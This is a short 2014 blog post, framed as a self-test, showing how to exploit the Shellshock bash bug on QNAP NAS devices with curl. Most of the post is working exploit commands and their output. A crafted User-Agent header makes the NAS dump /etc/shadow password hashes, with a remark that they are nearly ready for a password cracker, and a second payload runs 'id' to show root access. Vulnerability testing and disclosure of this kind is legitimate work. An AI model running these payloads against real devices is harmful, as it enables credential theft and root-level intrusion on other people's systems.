Saturday, September 27, 2014

Using curl to test Qnap NAS for Shellshock

The following briefly appeared in a Qnap forum, but was apparently quickly removed.

Since I feel it's a useful test, here it is:

Fun Shellshock test with curl

Testing your NAS for the Shellshock vulnerability with curl:

NAS_IP=192.168.1.XXX    # Use the IP or the name of your NAS

URL=http://$NAS_IP:8080/cgi-bin/index.cgi
curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; cat /etc/shadow" $URL

And enjoy the output of your users and crypted passwords in a format almost ready to be fed to John The Ripper:

admin:$1$$abc...:14233:0:99999:7:::
guest:$1$$abc...:14233:0:99999:7:::
httpdusr:!:16087:0:99999:7:::
otheruser:$1$$abc...:16087:0:99999:7:::
TimeMachine:$1$$abc...:16087:0:99999:7:::
Location:/cgi-bin/login.html?20130912

(The password hashes have been redacted in this output of course)

If your NAS can be reached from the Internet, you better disconnect it now...

What this also shows is that the NAS http server appears to be running as root, since the /etc/shadow file should only be readable by root!

And indeed:

$ curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; id" $URL

uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

this shows the id of the web server process as "admin", with UID 0 and GID 0. So it's really running as root, which is certainly very helpful for NAS-hackers.